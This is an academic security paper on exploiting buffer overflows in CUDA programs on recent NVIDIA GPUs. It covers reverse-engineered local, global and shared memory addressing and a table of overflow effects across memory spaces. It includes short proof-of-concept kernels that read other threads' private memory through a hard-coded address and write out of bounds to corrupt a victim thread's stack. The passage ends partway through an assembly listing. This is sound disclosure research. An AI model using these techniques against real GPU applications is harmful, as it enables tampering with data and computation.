GPU Memory Exploitation for Fun and Profit
Yanan Guo∗† (University of Rochester)    Zhenkai Zhang∗ (Clemson University)    Jun Yang (University of Pittsburgh)
∗These authors contributed equally to this work.
†This work was primarily conducted while the author was affiliated with the University of Pittsburgh.

Abstract

As modern applications increasingly rely on GPUs to accelerate computation, it has become critical to study and understand the security implications of GPUs. In this work, we conduct a thorough examination of buffer overflows on modern GPUs. Specifically, we demonstrate that, due to the GPU's unique memory system, GPU programs suffer from different and more complex buffer overflow vulnerabilities compared to CPU programs, contradicting the conclusions of prior studies. In addition, despite the critical role GPUs play in modern computing, GPU systems are missing essential memory protection mechanisms. Consequently, when buffer overflow vulnerabilities are exploited by an attacker, they can lead to both code injection attacks and code reuse attacks, including return-oriented programming (ROP). Our results show that these attacks pose a significant security risk to modern GPU applications.

1 Introduction

Graphics Processing Units (GPUs) were originally designed and used for high-quality graphics rendering. However, over the past decade, they have evolved into general-purpose computing platforms. Due to their high-throughput capabilities, GPUs are now used in various fields, including weather prediction [37], cryptocurrency mining [28], and bioinformatics analysis [34]. In addition, GPUs have today become the de facto standard choice for running deep learning applications [9, 17, 24, 29, 30, 47, 52, 55, 56]. Given the growing significance of GPUs, NVIDIA recently announced the Grace Hopper Superchip [42], which is designed for giant-scale artificial intelligence (AI) and high-performance computing (HPC) applications. This superchip combines NVIDIA Grace CPUs and Hopper GPUs using the high-speed NVLink interconnect [43]. This wide deployment of GPUs calls for a thorough study of their security implications.

Memory safety violations (memory errors) have long been a significant security concern for computing systems. These violations are the most common root cause of modern exploits (attacks). For example, buffer overflows can allow attackers to overwrite return addresses and thus hijack the control flow of a program, potentially leading to the execution of malicious code. In fact, reports from Google and Microsoft show that memory errors account for around 70% of all security issues addressed in their products [23, 39]. Memory safety violations, together with the associated exploitation techniques, have been widely studied for CPU programs. Modern CPUs have even implemented certain built-in defense mechanisms against these vulnerabilities (e.g., [31, 32, 59]). However, the vulnerabilities in GPU programs have not received the same attention.

CUDA [41], developed by NVIDIA, is one of the most popular general-purpose GPU programming languages in use today. Since CUDA is extended from C and C++, languages known for their memory-unsafe characteristics, there is a concern that CUDA programs could have similar memory safety vulnerabilities. In this paper, we delve into this concern, aiming to answer the following questions:

Can memory errors occur in CUDA programs running on NVIDIA GPUs? If so, what types of attacks can arise from these errors?

Several prior studies have explored the memory safety vulnerabilities in CUDA programs [19, 38, 48]. They show that memory safety violations, especially buffer overflows, can occur in CUDA programs as well. However, they also argue that conventional CPU memory exploitation techniques, such as code injection and code reuse, are inapplicable for attacking CUDA programs. We found that their investigations have significant limitations.

First, the investigations in these studies are preliminary and lack a comprehensive analysis of the memory safety vulnerabilities inherent to GPU programs. For example, unlike C and C++, CUDA features multiple, distinct memory spaces, aligning with the GPU's specialized memory hierarchy.
Data in different memory spaces have different scopes and are accessed in different manners. Prior studies have only shown that buffer overflows can occur within individual memory spaces. They have not explored whether a buffer overflow in one memory space can directly affect data in another memory space. Second, these studies were conducted on earlier NVIDIA GPUs, with older architectures (Pascal and earlier) and CUDA compute capabilities (sm_60 and earlier). Notably, NVIDIA has made significant changes to the GPU system starting with the Volta architecture (sm_70), which was released in 2017. Thus, the conclusions made in prior studies may not apply to modern GPU architectures.

Figure 1: GPU architecture overview. (Diagram: each SM contains cores, LD/ST units, SFUs, a register file, an L1 cache, and shared memory; SMs share an L2 cache and an L1/L2/L3 TLB hierarchy; the GMMU, with its page walk queue and page walk cache, sits in front of the off-chip device memory, which holds the page tables.)

In this work, we conduct a thorough examination of the buffer overflow problem on modern NVIDIA GPUs. First, we reverse engineer the mechanisms used to access various memory spaces. Specifically, we show how GPU hardware identifies memory references to each memory space and how it conducts address translation for these memory spaces. Based on the reverse engineering results, we demonstrate that an out-of-bounds (OOB) operation on data in one memory space can influence data in another, despite the fact that different memory spaces utilize different instructions for access. Furthermore, we reveal that OOB operations can be exploited to access data beyond their legitimate scopes. For example, one thread can access the local memory belonging to another thread.

Then, we study potential GPU attack methodologies leveraging these buffer overflow vulnerabilities. We found that modern NVIDIA GPUs are missing fundamental memory protection mechanisms. As a result, traditional memory exploitation techniques (which have been mitigated on CPUs) remain feasible on GPUs. For example, GPUs do not distinguish between code and data pages: data pages are executable, and code pages are writable.

In addition, we analyze the mechanics of function calls and returns on modern GPUs. Our investigation reveals that code reuse attacks, such as return-oriented programming (ROP) [50], can be employed against CUDA programs. We further discover that the CUDA driver API library is linked into each CUDA program; certain functions from this library are loaded into GPU memory upon the execution of any CUDA program. Importantly, this library code contains multiple ROP gadgets, including several memory read/write gadgets, which can enable powerful ROP-based attacks.

Finally, we show that the above memory exploitation techniques can be used to attack modern GPU applications such as deep neural network (DNN) inference. For example, by modifying the DNN weights, the attacker can significantly degrade the DNN inference accuracy, reducing it to the level of random guessing in the most severe cases.

Responsible disclosure. We disclosed our findings to NVIDIA in October 2023, who acknowledged our work and requested to be notified when the results become publicly available.

2 Background

In this section, we provide an overview of the GPU architecture, programming models, and memory spaces. Note that while the concepts we describe are general to GPU computing platforms, we use NVIDIA's terminology for our descriptions.

2.1 GPU Basics

GPU architecture. Figure 1 shows an architecture overview of a typical GPU. The basic processing units in a GPU are called streaming multiprocessors (SMs). Each SM has a set of simple cores. With these cores, an SM can execute a group of parallel threads (known as a warp) in a Single-Instruction Multiple-Thread (SIMT) fashion. Modern GPUs usually have tens to hundreds of SMs. With a typical warp size of 32, a GPU can run thousands of threads simultaneously.

Each SM in a GPU contains its own register file, consisting of general-purpose registers and special registers. The general-purpose registers are partitioned among the threads that run on the SM. For example, in NVIDIA Ampere GPUs, every thread in an SM has its own 256 general-purpose registers, labeled from R0 through R255 [12, 46]. These registers temporarily store data that threads need immediate access to, such as variables or intermediate computation results. On the other hand, special registers have different roles and are used for specialized tasks. For example, CLOCK provides the current clock cycle count. Unlike general-purpose registers, some of the special registers are shared among all threads in the SM.

To serve the memory bandwidth demands of a large number of threads, a GPU has its own dedicated memory system, as shown in Figure 1. Each SM has its own private L1 cache and shared memory. SMs are connected to the shared L2 cache through a hierarchical on-chip network; the L2 cache is further connected to memory controllers which interface with the off-chip device memory. Similar to host memory on the CPU side, device memory is also based on DRAM. Currently, GDDR6 and HBM2 are the two most widely used DRAM types in
client and server GPUs, respectively. Note that the memory systems of the CPU and GPU are independent of each other. Before a program starts running on the GPU, the GPU driver loads the corresponding code into the device memory. Similarly, the data required by the GPU program must also be transferred to the device memory (before the data can be accessed). This is typically done through explicit operations in the program, although there are instances where the driver manages this data transfer implicitly [1].

    1  /** device function **/
    2  __device__ void add(char *d_global) {
    3      d_global[0] += 1;
    4  }
    5
    6  /** CUDA kernel **/
    7  __global__ void mem_type(char *d_global) {
    8      char d_local[10];
    9      d_local[0] = d_global[0];
    10     __shared__ char d_shared[10];
    11     d_shared[0] = d_global[0];
    12     add(d_global);
    13 }
    14
    15 /** CPU function, calling the CUDA kernel **/
    16 void kernel_launch(char *d_cpu) {
    17     char *d_global;
    18     /** Allocate a GPU buffer **/
    19     cudaMalloc(&d_global, 1024);
    20     cudaMemcpy(d_global, d_cpu, 1024,
    21                cudaMemcpyHostToDevice);
    22     mem_type<<<8,32>>>(d_global);
    23 }

Listing 1: An example CUDA program that uses multiple GPU memory spaces.

GPU virtual memory management. Modern GPU memory is virtualized, operating on a paging system. When SMs generate virtual addresses, the memory management unit (MMU) on the GPU performs virtual-to-physical address translation using the GPU page tables. Each running GPU program (i.e., a GPU context) has one page table. These page tables (from different active GPU contexts) are stored in the GPU memory and are regulated by the GPU driver [58]¹. Similar to CPU page tables, a GPU page table also has multiple levels: given a virtual memory address, the GPU MMU walks through these levels to find the page table entry (PTE) that contains the desired translation information. Prior work [58] has shown that recent NVIDIA GPUs use 5-level page tables. During a page table walk, a 49-bit virtual address is segmented, and its parts are used to select the walking path through the hierarchy.

¹The GPU driver also maintains a copy of the page tables in host memory.

2.2 GPU Programming and Execution

GPU programming model. GPUs were originally designed to accelerate graphics and multimedia processing; they could only be programmed using certain APIs such as OpenGL [53] and DirectX [36] to support 2D/3D graphics rendering. As the demand for utilizing GPUs in non-graphics computing tasks increases, various general-purpose GPU programming models have emerged. Of these, CUDA stands out as arguably the most successful and broadly used [41]. Listing 1 presents a simple CUDA program. Within the context of a CUDA program, there are several specific terms:

- GPU kernel. A kernel (line 7) is a function that is executed on the GPU and can be invoked from the host CPU. A CUDA program may consist of one or more kernels. To invoke a kernel, the GPU driver sends a corresponding kernel launch command to the GPU. It will first create a grid of thread blocks, with each block containing a certain number of threads. These thread blocks are then scheduled onto the available SMs on the GPU. When launching a kernel, the host code needs to specify the desired number of thread blocks and threads. For example, Listing 1 launches a kernel with 8 thread blocks and 32 threads in each block (line 22).

- Device function. A device function is a function that can only be called from kernels or other device functions. It can only be executed on the GPU (line 2).

NVIDIA PTX and SASS. PTX is an intermediate-level instruction set for NVIDIA GPUs that remains stable across different GPU generations. CUDA code is first compiled into PTX, and PTX is further compiled down to SASS, the low-level assembly language for NVIDIA GPUs. SASS instructions directly execute on NVIDIA GPU hardware. These instructions are tailored to the specific architecture of the GPU; different GPU generations may use different SASS instructions.

SASS instruction encoding. NVIDIA GPUs use a fixed-length instruction encoding format. Originally, the instruction length was 8 bytes. Starting with the Volta generation (released in 2017), the instruction length has been extended to 16 bytes. Unlike CPUs that typically use hardware-based instruction scheduling, NVIDIA GPUs delegate this scheduling task to the compiler. On Volta and later GPUs (with 16-byte instructions), the scheduling codes are embedded into the higher bits of each individual instruction, which specify the minimum wait time between consecutive instructions to meet dependency constraints. Figure 2 shows the encoding of the MOV instruction on Volta GPUs.

Figure 2: The encoding of the MOV instruction on Volta GPUs. (The instruction MOV R2, 0xdeadbeef encodes as 0x003fde00 00000f00 deadbeef 00027802; the labeled fields are the scheduling code, opcode_high, the 32-bit constant, the register index, and opcode_low.)
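To make the field layout concrete, the host-side sketch below packs the four 32-bit words of the Figure 2 example. The field positions are read off that single example, and the in-memory byte order is an assumption, so treat this as an illustration rather than a complete encoder.

    #include <cstdint>
    #include <cstdio>

    /* Packs "MOV Rd, imm32" using the field positions suggested by Figure 2
       (opcode_low and the register index in one word, then the constant,
       opcode_high, and the scheduling code). Only the R2 / 0xdeadbeef example
       from the figure is known to be correct. */
    static void encode_mov(uint8_t dst_reg, uint32_t imm, uint32_t out[4]) {
        out[0] = 0x00007802u | ((uint32_t)dst_reg << 16); /* opcode_low + register index */
        out[1] = imm;                                     /* 32-bit constant              */
        out[2] = 0x00000f00u;                             /* opcode_high                  */
        out[3] = 0x003fde00u;                             /* scheduling code              */
    }

    int main() {
        uint32_t w[4];
        encode_mov(2, 0xdeadbeef, w);  /* reproduces the Figure 2 example */
        printf("%08x %08x %08x %08x\n", w[3], w[2], w[1], w[0]);
        return 0;
    }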
2.3 GPU Memory Spaces

Most GPU programming models allow memory allocation in different memory spaces, each of which has its unique behavior. Listing 1 shows a CUDA program that uses global,
local, and shared memory, which are the most frequently used memory spaces in CUDA programs. The specific features of these memory spaces are shown in Table 1. We omit the discussion of other memory spaces, such as texture memory, as they are not related to our study.

Table 1: The specification of the pointers in Listing 1.

| Pointer  | Memory type   | Storage                   | Cached | Load/store instructions | Scope        |
| d_global | Global memory | Device memory (off chip)  | Yes    | LDG/STG                 | Process      |
| d_local  | Local memory  | Device memory (off chip)  | Yes    | LDL/STL                 | Thread       |
| d_shared | Shared memory | Shared memory (on chip)   | No     | LDS/STS                 | Thread block |

- Global memory is managed by the GPU driver. Buffers in global memory can only be allocated by CPU code (before kernel launches) through driver API calls (line 19 in Listing 1). Global memory resides in the GPU's off-chip device memory; it can be cached in both the L1 and L2 caches. A buffer in global memory is accessible to all the threads in all the kernels of the program, until the buffer is freed. The load and store operations for global memory are usually performed using the instructions LDG and STG, respectively. In Listing 1, d_global is a buffer in global memory.

- Local memory is private to each thread. It is used to store the stack of a thread and is thus also called stack memory. Similar to global memory, local memory also resides in the device memory (and the caches). However, unlike global memory, data in local memory do not persist across kernels (since they are thread-private). The instructions LDL and STL are particularly used for local memory. d_local in Listing 1 is a buffer stored in local memory.

- Shared memory is a scratchpad memory region. It is shared among all the threads within the same thread block. As shown in Figure 1, shared memory is on-chip. Developers can place the data that is accessed frequently by threads in the same block into shared memory, in order to avoid the slow global memory access. Data in shared memory are not backed up in the off-chip device memory. LDS and STS are used for shared memory operations. d_shared in Listing 1 resides in shared memory.

In addition to the instructions mentioned above that are used for each particular memory space, there are also generic load and store instructions LD and ST, which can be used for accessing all the memory spaces.

3 GPU Memory Safety

3.1 Prior Art

Since CUDA is an extension of C/C++, CUDA programs can also have memory vulnerabilities similar to those in C/C++ programs. Several prior studies [19, 38, 48] have revealed that some of the memory errors found in CPU programs, such as buffer overflows, can also occur in CUDA programs. However, these studies have some limitations, which we explain below.

First, the investigations presented in these studies are fundamental and do not delve deeply into the problems particular to GPUs. For example, as explained in Section 2.3, CUDA features multiple, distinct memory spaces (unlike C and C++). Prior studies have only identified that buffer overflow errors can occur within a specific memory space. For instance, an OOB operation on a local memory buffer can compromise other data stored in that same local memory. However, they have not explored whether such an OOB operation can affect data in a different memory space.

Second, given that these studies were carried out several years ago, they only examined older GPUs (before Volta). However, NVIDIA has made significant changes to their GPUs since the Volta architecture [25]. For example, a new ISA has been introduced, where the instruction length was changed from 8 bytes to 16 bytes. Therefore, conclusions from these studies may not apply to newer GPU architectures. For example, these prior studies have two common conclusions. 1) Exploiting buffer overflow to hijack control flow in CUDA is very difficult because the return address is stored in an undisclosed memory location, not on the stack. 2) Traditional code injection attacks cannot be applied against CUDA programs because code and data are separated in memory. However, through our analysis (in Section 4), we found that their conclusions do not hold.

3.2 Our Goal

As GPUs have become a major computing component these days, it is important to understand the security problems that exist in modern GPUs. Our objective is to present an in-depth analysis of buffer overflow vulnerabilities on these computing devices, shedding light on the hidden threats that have been overlooked for years.

4 Demystifying GPU Memory

In this section, we provide a detailed analysis of GPU buffer overflows, addressing the limitations mentioned in Section 3. To gain a thorough understanding of the GPU memory model, we develop a tool using Direct Memory Access (DMA) to dump the content of device memory. We further manage to recover the page tables stored in device memory. NVIDIA has made their driver source code public. Therefore, from the driver code section concerning GPU page management [2] (and other NVIDIA documents [45]), we can obtain the overall format of the page table on NVIDIA GPUs. This allows us to identify and reconstruct the page table from the extracted device memory. Note that unless specified otherwise, all the experiments in this section are conducted on a system
with an NVIDIA GeForce RTX 3080 GPU, NVIDIA driver 470.63.01, CUDA 11.4, and the Ubuntu 20.04 OS. To simplify the analysis, we turn off CUDA ASLR.

4.1 Buffer Overflows across Memory Spaces

Here we study the buffer overflow issues in CUDA programs. As explained in Section 3, prior studies (e.g., [38]) have already shown that buffer overflows can cause memory corruption within a single memory space. Thus, we focus more on investigating the impact of buffer overflows across different memory spaces. Specifically, we first explore this problem between local and global memory, and then extend the study to cover the problem between these two and shared memory.

4.1.1 Accesses to Global and Local Memory

Global memory accesses are relatively straightforward. Global memory is indexed using a 49-bit virtual address (which is stored as a 64-bit value). There are two primary ways to access global memory: using the specialized LDG/STG instructions or the generic LD/ST instructions (cf. Section 2.3). These two pairs of instructions operate in a similar manner: as demonstrated in Listing 2, the target virtual memory address of the instruction is stored in a 64-bit register, which is formed by combining two 32-bit registers. We are not aware of any fundamental differences between accessing global memory using these two pairs of instructions. The choice of which pair to use appears to be based on the compiler's preference. Empirically, we observe that when the debugging option is enabled, the NVCC compiler always chooses LD/ST; otherwise it prefers LDG/STG.

    /** R6: 0xcda00000 **/
    /** R7: 0x7fff **/
    /** R6.64 means R7||R6 **/
    LDG R8, [R6.64]
    STG [R6.64], R8

    LD R8, [R6.64]
    ST [R6.64], R8

Listing 2: Code for accessing global memory.

    /** R6: 0xfffd80 **/
    LDL R8, [R6]
    STL [R6], R8

    /** R6: 0xf2fffd80 **/
    /** R7: 0x7fff **/
    LD R8, [R6.64]
    ST [R6.64], R8

Listing 3: Code for accessing local memory.

As local memory is private to individual threads, local memory accesses are more complicated than global memory accesses, as detailed below.

Instructions. Much like global memory, there are also two sets of instructions for accessing local memory, LDL/STL and LD/ST. However, they work very differently. As shown in Listing 3, LDL/STL uses a 24-bit address² stored in a 32-bit register. In contrast, as explained earlier, LD/ST requires a 49-bit virtual address (from a 64-bit register). In fact, we found that when LD/ST are used to access local memory, the 49-bit address appears to be the 24-bit address prefixed with a 25-bit value (which is 0x7ffff2 on our system). Note that virtual addresses belonging to other memory spaces never begin with this prefix value on our machine. Unlike global memory, the compiler always prefers to access local memory with LDL/STL, even when the debug flag is on.

²We found that the local memory for each thread is indexed with a 24-bit address using CUDA-GDB. This observation aligns with the findings from prior research [57].
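As a quick illustration of how the two addressing forms relate, the small host-side snippet below concatenates the 25-bit prefix observed on the tested system with the 24-bit per-thread offset from Listing 3; the prefix value is specific to that machine.

    #include <cstdint>
    #include <cstdio>

    int main() {
        uint32_t local_off = 0xfffd80;                    /* 24-bit address used by LDL/STL          */
        uint64_t prefix    = 0x7ffff2;                    /* system-specific prefix (Section 4.1.1)  */
        uint64_t full_va   = (prefix << 24) | local_off;  /* 49-bit address usable by LD/ST          */
        printf("0x%llx\n", (unsigned long long)full_va);  /* prints 0x7ffff2fffd80                   */
        return 0;
    }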
    1  __global__ void local_arr() {
    2      uint32_t arr[10];
    3      for (int i = 0; i < 10; i++)
    4          arr[i] = 0xdead0000 + threadIdx.x;
    5      uint32_t *ptr = arr;
    6      printf("thread %u addr %p data %u\n",
    7             threadIdx.x, ptr, ptr[0]);
    8  }
    9  int main() {
    10     local_arr<<<1,32>>>();
    11     return 0;
    12 }

Listing 4: A simple CUDA program that allocates buffers in local memory.

Memory layout. We use the program in Listing 4 to explain the local memory layout: the CUDA kernel (local_arr) is launched with 32 threads per thread block and just one thread block overall. In this kernel, every thread allocates a local array (arr), resulting in 32 individual arrays in total. According to NVIDIA, each thread is only able to access its own array, but not the arrays that belong to other threads.

To understand how local memory is stored in the device memory, we execute the program in Listing 4 and pause it at line 6. Then, we dump the device memory content and identify the location of arr within it (by the data pattern). Figure 3 (b) shows a segment of the dumped device memory where arr resides. From this figure, we can observe that the local memory of different threads appears interleaved in the device memory. Specifically, the device memory sequentially stores arr[0] from all threads, then arr[1] from all threads, and so forth. We then conduct further experiments, adjusting the total thread count and the array's data type. These experiments reveal that every 32 bits of local memory from threads in a warp (comprising 32 threads) are always stored contiguously within the device memory. For variables larger than 32 bits, they are split into 32-bit segments and stored separately. Note that this layout information can help an attacker deliberately tamper with the local memory data, which we will show later.
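The way we locate arr in the dump can be replicated with a few lines of host code; the sketch below scans a raw dump file for the 0xdead0000 to 0xdead001f pattern written by Listing 4 (the file name is a placeholder for whatever the DMA tool produces).

    #include <cstdint>
    #include <cstdio>
    #include <vector>

    /* Scans a raw device-memory dump for the values Listing 4 stores in
       arr[0] (0xdead0000 + threadIdx.x for threads 0..31, stored back to back). */
    int main() {
        FILE *f = fopen("devmem.dump", "rb");          /* placeholder dump file */
        if (!f) return 1;
        std::vector<uint32_t> mem;
        uint32_t w;
        while (fread(&w, sizeof(w), 1, f) == 1) mem.push_back(w);
        fclose(f);
        for (size_t i = 0; i + 32 <= mem.size(); i++) {
            bool hit = true;
            for (uint32_t t = 0; t < 32 && hit; t++)
                hit = (mem[i + t] == 0xdead0000u + t);
            if (hit)
                printf("arr[0] of threads 0-31 found at offset 0x%zx\n", i * sizeof(uint32_t));
        }
        return 0;
    }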
Addressing. Given that each thread has its own private arr, one might naturally expect that each arr would have a distinct virtual address, which is similar to the scenario on CPUs. However, when we print the address of arr[0] (or ptr[0]) as done in line 6 of Listing 4, we have two interesting observations, as shown in Figure 4. First, arr[0] of different threads actually have the same virtual address. This virtual address is 0x7ffff2fffd80 on our machine (prefix + local memory address, cf. Listing 3). Second, when performing a data access using this address, each thread retrieves different data. More specifically, for a given thread, the retrieved data corresponds to arr[0] of that thread. With these results, we believe the mapping between the virtual and physical addresses of local memory aligns with the one depicted in Figure 3 (a) and (b): the physical address that a virtual address points to may vary, depending on the ID of the thread accessing this virtual address.

Figure 3: The mapping details of local memory: (a) the translation between virtual local addresses and physical addresses; (b) the layout of local memory (in device memory); (c) the translation between virtual PT addresses and physical addresses. (The dump shows arr[0] of threads 0–31 stored back to back in physical frame 0x3ea, followed by arr[1] of all threads; the virtual local address 0x7ffff2fffd80 resolves to the accessing thread's own arr[0], while the virtual PT addresses 0x7fffc4014000, 0x7fffc4014004, ... map to arr[0] of threads 0, 1, ... in order.)

A natural question here is how the same virtual address is translated to different physical addresses (for different threads). While the specifics of local memory address translation on NVIDIA GPUs remain undisclosed, we give a conjecture here: there is likely a unique address translation mechanism for local memory, which is based on both the address and the thread ID. Moreover, the GPU hardware is able to recognize that a given memory operation is targeting the local memory (instead of other memory spaces) based on the given virtual address or the instruction. Specifically, it is considered a local memory operation if 1) the instruction is LDL/STL or 2) the instruction is LD/ST and the address begins with a certain pattern (e.g., 0x7ffff2).

    thread 0 addr 0x7ffff2fffd80 data 0xdead0000
    thread 1 addr 0x7ffff2fffd80 data 0xdead0001
    thread 2 addr 0x7ffff2fffd80 data 0xdead0002
    ...

Figure 4: The output of line 6 in Listing 4.

Upon examining the page table of the program in Listing 4, we have a very interesting observation. The aforementioned virtual addresses for local memory data (e.g., 0x7ffff2fffd80 for arr[0]) are not mapped to any valid physical addresses, according to the page table.³ Instead, for each data block in the local memory, a disparate virtual address (e.g., 0x7fffc4014000 for thread 0's arr[0]), seemingly unrelated to the unmapped virtual address above, is mapped to the physical address of this data block, as shown in Figure 3 (c). Importantly, when using this virtual address to access local memory, every thread gets the same data when accessing the same virtual address. For example, any thread accessing the address 0x7fffc4014000 will retrieve the value of thread 0's arr[0] (0xdead0000), regardless of its thread ID. Similarly, using the address 0x7fffc4014004, every thread gets the value of thread 1's arr[0] (0xdead0001).

³This also confirms that there is a special address translation path for local memory addresses.

From the above results, we have two conclusions. First, for each physical address in local memory, there are two virtual addresses that can be used to access this physical address. Only one of them has a valid mapping in the page table; we refer to this virtual address as the virtual PT address (e.g., 0x7fffc4014000 in Figure 3 (c)), and refer to the other virtual address as the virtual local address (e.g., 0x7ffff2fffd80 in Figure 3 (a)). Second, as explained above, when accessing a virtual local address, the GPU hardware can recognize that this address is targeting the local memory and triggers a special address translation routine for it. This special routine takes the thread ID into account, and thus ensures that each thread can only access its own local memory. However, when accessing a virtual PT address, the GPU hardware does not recognize it as a local memory access, and therefore does not employ this special translation routine. Once knowing this address, one thread can access/modify the local memory of another thread in the program.

To further validate that both the virtual local address and the virtual PT address point to the same physical address, we conduct a read-after-write experiment. First, we write to arr[0] of thread 0 using the virtual PT address. Then, we read arr[0] of thread 0 using the virtual local address. We found that we can only read out the previously written value if we access another buffer whose size is at least 128B between our write and read operations. Given that the L1 Dcache line size on our GPU is 128B and L1 is indexed using virtual addresses and tagged using physical addresses, we believe that these two virtual addresses are linked to the same physical address.
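The kernel below sketches this cross-thread access, assuming the attacker already knows a virtual PT address; the value 0x7fffc4014000 is the one observed on the paper's RTX 3080 setup with CUDA ASLR disabled, and the hard-coded constant is only for illustration. Dereferencing it with a generic pointer bypasses the per-thread translation, so thread 0 can dump every thread's private arr[0].

    #include <cstdio>
    #include <cuda_runtime.h>

    /* Sketch only: each thread fills a private local array, then thread 0
       walks the other threads' copies of arr[0] through the virtual PT
       address (no per-thread translation is applied on that path). */
    __global__ void read_peer_local() {
        unsigned int arr[10];
        for (int i = 0; i < 10; i++)
            arr[i] = 0xdead0000 + threadIdx.x;        /* force arr into local memory */
        unsigned int *ptr = arr;                      /* as in Listing 4              */
        __syncthreads();
        if (threadIdx.x == 0) {
            volatile unsigned int *pt =
                (volatile unsigned int *)0x7fffc4014000ULL;  /* assumed virtual PT address */
            for (int t = 0; t < 32; t++)              /* arr[0] of threads 0..31 lie back to back */
                printf("thread %d arr[0] = 0x%x (mine: 0x%x)\n", t, pt[t], ptr[0]);
        }
    }

    int main() {
        read_peer_local<<<1, 32>>>();
        cudaDeviceSynchronize();
        return 0;
    }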
Table 2: Summary of the buffer overflow problem in CUDA; ✓ means the OOB operation can affect this memory space, while ✗ means it cannot. The four marks in each cell correspond to the scopes: same thread / same thread block / same kernel / same program.

| OOB source | Instructions | Global mem | Local mem | Shared mem |
| Global mem | LDG/STG | ✓ ✓ ✓ ✓ | ✓ ✓ ✓ ✗ | ✗ ✗ ✗ ✗ |
| Global mem | LD/ST   | ✓ ✓ ✓ ✓ | ✓ ✓ ✓ ✗ | ✓ ✓ ✗ ✗ |
| Local mem  | LDL/STL | ✗ ✗ ✗ ✗ | ✓ ✗ ✗ ✗ | ✗ ✗ ✗ ✗ |
| Local mem  | LD/ST   | ✓ ✓ ✓ ✓ | ✓ ✓ ✓ ✗ | ✓ ✓ ✗ ✗ |
| Shared mem | LDS/STS | ✗ ✗ ✗ ✗ | ✗ ✗ ✗ ✗ | ✓ ✓ ✗ ✗ |
| Shared mem | LD/ST   | ✓ ✓ ✓ ✓ | ✓ ✓ ✓ ✗ | ✓ ✓ ✗ ✗ |

Takeaway 1: On NVIDIA GPUs, each data block in local memory is linked to two virtual addresses; one of these addresses allows a CUDA thread to access/modify the local memory of other threads.

4.1.2 Overflows across Global and Local Memory

OOB global memory references. Recall that global memory operations always use a 64-bit address, regardless of the instruction used. Therefore, attackers could exploit a buffer overflow vulnerability in global memory to influence any location in the device memory, including the local memory. Specifically, when accessing a global memory buffer with an OOB index, the attacker can manipulate the index to direct the target address (base address + index) towards either 1) the virtual PT address or 2) the virtual local address of the data in the local memory. Here we discuss the feasibility of these two approaches:

- Accessing a virtual PT address. As mentioned earlier, there are two sets of instructions for global memory references, LD/ST and LDG/STG. From our experiments, providing any of these instructions with a virtual PT address causes them to execute as expected, accessing the data in the local memory (of any thread) with the given address.

- Accessing a virtual local address. When providing a virtual local address to LDG/STG, it prompts a runtime error citing an illegal memory access. In contrast, when providing such an address to LD/ST, the instruction executes without any error. However, as explained before, using a virtual local address prevents us from modifying or accessing data belonging to other threads. We discuss this approach only for completeness. In real-world scenarios, the attacker would likely choose the former approach.

In short, a buffer overflow error in global memory may allow an attacker to target a virtual PT address, granting the attacker potential access to, or the ability to modify, the local memory data of any active thread in the program.
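A minimal sketch of that first approach is shown below; the kernel and parameter names are hypothetical, and the virtual PT address is assumed to have been discovered in advance (e.g., on a system without effective ASLR).

    /* Hypothetical vulnerable access pattern: buf is a global-memory buffer
       whose index is attacker-influenced and never bounds-checked. Because
       global and local memory share one 49-bit virtual address space, a
       single out-of-bounds index reaches a victim thread's virtual PT
       address and overwrites its local (stack) data. */
    __global__ void oob_write(unsigned int *buf, unsigned long long buf_va,
                              unsigned long long target_pt_va, unsigned int value) {
        long long idx = (long long)(target_pt_va - buf_va) / (long long)sizeof(unsigned int);
        buf[idx] = value;   /* compiles to an ST/STG with a fully attacker-chosen address */
    }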
OOB local memory references. We found that there is a substantial gap between the virtual local addresses (of the local memory) and the virtual addresses of the global memory. On the tested system, the minimum difference between such addresses is 0x10000000. With this discrepancy, whether an OOB operation on local memory can affect global memory actually depends on the specific instruction handling the operation: when using LDL/STL, which operates with a 24-bit address (the lower 24 bits of the virtual local address), OOB operations on local memory cannot affect global memory. In contrast, if LD/ST, which takes the full 64-bit virtual local address, is used, an OOB operation on local memory has the potential to fetch/modify data in global memory.

4.1.3 Overflows across Shared Memory and Local/Global Memory

Data in shared memory is accessed in a similar manner to data in local memory. Specifically, shared memory can be accessed with either 1) the specialized instructions LDS/STS, using a 24-bit address, or 2) the generic instructions LD/ST, using a 49-bit address. Again, the 49-bit address is formed by adding a prefix to the 24-bit address, which is 0x7ffff4 on the tested system. Consequently, when using the LD/ST instructions, an OOB operation on data in shared memory may affect the data in global or local memory. In addition, an OOB operation on data in global or local memory (with LD/ST) can affect the data in shared memory. Note that, unlike local memory, shared memory does not have a virtual PT address, since it is not part of the device memory. This means accesses to shared memory remain confined to their legitimate scope (within the thread block). We cannot utilize virtual PT addresses to perform out-of-scope shared memory accesses (as done for local memory).

4.1.4 Summary

We provide a comprehensive summary of the overflow problem in CUDA in Table 2. First, with respect to the memory space, when using the generic memory instructions LD/ST, the problem can occur within a single memory space or across different spaces. In contrast, when using the specialized instructions (e.g., LDL/STL), the problem is restricted to a single memory space. An exception is that OOB global memory references with LDG/STG can influence local memory.

Second, in terms of memory scope (i.e., visibility), when targeting local memory, an overflow error can result in ac-
cesses beyond the intended scope. This is due to the use of virtual PT addresses. In other scenarios, memory accesses are always confined to the legitimate scope.

Notice that the conclusions presented in this section, particularly those related to how GPU memory accesses are managed, are based on extensive reverse engineering efforts. While they are supported by thorough experimentation, we cannot claim with absolute certainty that our findings are entirely accurate. However, it is crucial to note that the primary objective of our reverse engineering analysis is not to perfectly reconstruct the GPU memory access functionality, but rather to investigate the potential for buffer overflow vulnerabilities in CUDA programs. Despite any potential inaccuracies in our reverse engineering results, we have conclusively demonstrated that buffer overflows on GPUs can be exploited to access/modify data across different memory spaces and beyond legitimate scopes (Table 2).

    /** Start of the func **/          /** End of the func **/
    /** RZ is always 0 **/             LDL R2,  [R1+0x40] ;
    IADD3 R1, R1, -0x70, RZ ;          LDL R16, [R1+0x44] ;
    STL [R1+0x68], R25 ;               LDL R17, [R1+0x48] ;
    STL [R1+0x64], R24 ;               LDL R18, [R1+0x4c] ;
    STL [R1+0x60], R23 ;               LDL R19, [R1+0x50] ;
    STL [R1+0x5c], R22 ;               LDL R20, [R1+0x54] ;
    STL [R1+0x58], R21 ;               LDL R21, [R1+0x58] ;
    STL [R1+0x54], R20 ;               LDL R22, [R1+0x5c] ;
    STL [R1+0x50], R19 ;               LDL R23, [R1+0x60] ;
    STL [R1+0x4c], R18 ;               LDL R24, [R1+0x64] ;
    STL [R1+0x48], R17 ;               LDL R25, [R1+0x68] ;
    STL [R1+0x44], R16 ;               IADD3 R1, R1, 0x70, RZ ;
